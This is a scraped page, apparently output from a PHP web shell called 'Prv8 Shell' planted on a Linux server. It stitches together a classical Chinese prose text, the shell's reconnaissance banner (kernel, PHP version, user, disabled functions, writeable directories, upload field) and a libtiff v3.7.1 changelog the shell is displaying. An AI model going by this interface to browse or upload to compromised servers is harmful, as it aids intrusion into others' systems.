晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /usr/share/doc/libtiff-devel/html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/doc/libtiff-devel/html/v3.7.1.html
<HTML>
<HEAD>
<TITLE>
	Changes in TIFF v3.7.1
</TITLE>
</HEAD>

<BODY BGCOLOR=white>
<FONT FACE="Helvetica, Arial, Sans">
<FONT FACE="Helvetica, Arial, Sans"> 

<BASEFONT SIZE=4>
<B><FONT SIZE=+3>T</FONT>IFF <FONT SIZE=+2>C</FONT>HANGE <FONT SIZE=+2>I</FONT>NFORMATION</B>
<BASEFONT SIZE=3>

<UL>
<HR SIZE=4 WIDTH=65% ALIGN=left>
<B>Current Version</B>: v3.7.1<BR>
<B>Previous Version</B>: <A HREF=v3.7.0.html>v3.7.0</a><BR>
<B>Master FTP Site</B>: <A HREF="ftp://download.osgeo.org/libtiff">
download.osgeo.org</a>, directory pub/libtiff</A><BR>
<B>Master HTTP Site</B>: <A HREF="http://www.simplesystems.org/libtiff/">
http://www.simplesystems.org/libtiff/</a> 
<HR SIZE=4 WIDTH=65% ALIGN=left>
</UL>

<P>
This document describes the changes made to the software between the
<I>previous</I> and <I>current</I> versions (see above).
If you don't find something listed here, then it was not done in this
timeframe, or it was not considered important enough to be mentioned.
The following information is located here:
<UL>
<LI><A HREF="#hightlights">Major Changes</A>
<LI><A HREF="#configure">Changes in the software configuration</A>
<LI><A HREF="#libtiff">Changes in libtiff</A>
<LI><A HREF="#tools">Changes in the tools</A>
<LI><A HREF="#contrib">Changes in the contrib area</A>
</UL>
<p> 
<P><HR WIDTH=65% ALIGN=left>

<!--------------------------------------------------------------------------->

<A NAME="highlights"><B><FONT SIZE=+3>M</FONT>AJOR CHANGES:</B></A>

<UL>

	<li> This is mostly bugfix release. Most important fix is the one
	related to wrong custom tag read/write code.

</UL>


<P><HR WIDTH=65% ALIGN=left>
<!--------------------------------------------------------------------------->

<A NAME="configure"><B><FONT SIZE=+3>C</FONT>HANGES IN THE SOFTWARE CONFIGURATION:</B></A>

<UL>

	<li> autogen.sh: aclocal and autoheader should be executed after
	libtoolize.  Also add '-I .' to aclocal invocation to check
	current directory for macros.

	<li> nmake.opt: Link with the user32.lib in windowed mode. As per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=697">
		http://bugzilla.remotesensing.org/show_bug.cgi?id=697</a>

	<li> nmake.opt, makefile.vc: make it easier to rename the libtiff DLL.

	<li> configure, configure.ac: Added --enable-rpath option to embed
	linker paths into library binary.

</UL>

<P><HR WIDTH=65% ALIGN=left>

<!--------------------------------------------------------------------------->

<A NAME="libtiff"><B><FONT SIZE=+3>C</FONT>HANGES IN LIBTIFF:</B></A>

<UL>

	<li> tiff.h: Revert back libtiff data type definitions as per
	bug <a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=687">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=687</a>

	<li> tif_dirread.c: Do not forget about TIFF_VARIABLE2 when
	checking for tag count in TIFFReadDirectory() function. As per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=713">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=713</a>

	<li> tif_getimage.c: Support for multiple-alpha-channelled
	RGB-images as per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=718">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=718</a>

	<li> tif_getimage.c: #define A1 bracketing for clean build on
	SunPro compiler.

	<li> tif_dirwrite.c: Always write TIFFTAG_SUBIFD using LONG type
	as per bugs
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=703">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=703</a> and
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=704">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=704</a>.

	<li> tif_win32.c: Use char* strings instead of TCHAR in windowed
	mode as per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=697">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=697</a>

	<li> tif_dir.c, tif_dirread.c: Remove TIFFReassignTagToIgnore()
	call from the TIFFReadDirectory() function. TIFFReassignTagToIgnore
	must be removed in the future, as it was never used properly. As per
	bug <a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=692">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=692</a>

	<li> tif_jpeg.c: Added a work-around in order to allow
	compilation with the heavily modified version of libjpeg delivered
	with Cygwin.

	<li> tif_dir.c: Properly handle tags, which have the uint32
	counts. As per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=693">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=693</a>

	<li> tif_unix.c: Make UNIX module compilable (and usable)
	on Windows.

	<li> tiff.h: Added Adobe DNG tags.

	<li> tif_aux.c: Set the appropriate ReferenceBlackWhite array for
	YCbCr image which lacks that tag (noted by Hans Petter Selasky).

	<li> tif_color.c: Division by zero fixed (Hans Petter Selasky).

	<li> tif_stream.cxx, tiffio.h: Added C++ stream interface
	contributed by Edward Lam (see
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=654">
		http://bugzilla.remotesensing.org/show_bug.cgi?id=654</a>
	for details). Those who want to use C++ streams should
	#include <tiffio.hxx>.

	<li> tif_open.c: Removed close() in TIFFClientOpen() if file
	is bad. This is the callers responsibility.
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=651">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=651</a>

	<li> tiffio.h, tif_win32.c, libtiff.def}: Added TIFFOpenW()
	function to work with the double byte strings (used to represent
	filenames in some locales). As per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=625">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=625</a>

	<li> tif_dirread.c: Fixed problem when fetching BitsPerSample and
	Compression tags of type LONG from broken TIFFS as per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=662">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=662</a>

	<li> tif_dirinfo.c: Fixed definition for TIFFTAG_RICHTIFFIPTC,
	the writecount should have uint32 type. As per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=662">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=662</a>

	<li> tif_write.c: Fixed wrong if() statement in
	TIFFAppendToStrip() function as per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=660">
		http://bugzilla.remotesensing.org/show_bug.cgi?id=660</a>

	<li> tif_dirinfo.c: Change definition for TIFFTAG_EXTRASAMPLES
	field. The caller should supply a count when setting this field. As
	per bug <a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=648">
		http://bugzilla.remotesensing.org/show_bug.cgi?id=648</a>. 

	<li> tif_jpeg.c, tif_ojpeg.c: TIFFTAG_JPEGTABLES should have
	uint32 count. Use this type everywhere.

	<li> tif_next.c: avoid use of u_long and u_char types.

	<li> tif_fax3.c: Fixed case with the wrong decode routines
	choosing when the incorrect Group4Options tag set. As per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=323">
		http://bugzilla.remotesensing.org/show_bug.cgi?id=323</a>

	<li> tif_dirwrite.c: Fixed problem with passing count variable of
	wrong type when writing the TIFF_BYTE/TIFF_SBYTE tags in
	TIFFWriteNormalTag().

	<li> tif_compress.c: Zero division problem fixed (Vladimir Nadvornik,
	Dmitry V. Levin).

</UL>

<P><HR WIDTH=65% ALIGN=left>

<!-------------------------------------------------------------------------->
	
<A NAME="tools"><B><FONT SIZE=+3>C</FONT>HANGES IN THE TOOLS:</B></A>

<UL>

	<li> fax2ps.c: Be able to extract the first page (#0). As per bug
	<a href="http://bugzilla.remotesensing.org/show_bug.cgi?id=690">
	http://bugzilla.remotesensing.org/show_bug.cgi?id=690</a>

	<li> tiff2ps.c: Fixed wrong variable data type when read Position
	tags (Tristan Hill).

	<li> tiff2ps.c: Fixed wrong variable data type when read Resolution
	tags (Peter Fales).

	<li> tiffset.c: Check the malloc return value (Dmitry V. Levin).

</UL>

<P><HR WIDTH=65% ALIGN=left>

<!--------------------------------------------------------------------------->

<A NAME="contrib"><B><FONT SIZE=+3>C</FONT>HANGES IN THE CONTRIB AREA:</B></A>

<UL> 

	<li> No changes.

</UL>

Last updated $Date: 2016-09-25 20:05:45 $.

</BODY>
</HTML>

haha - 2025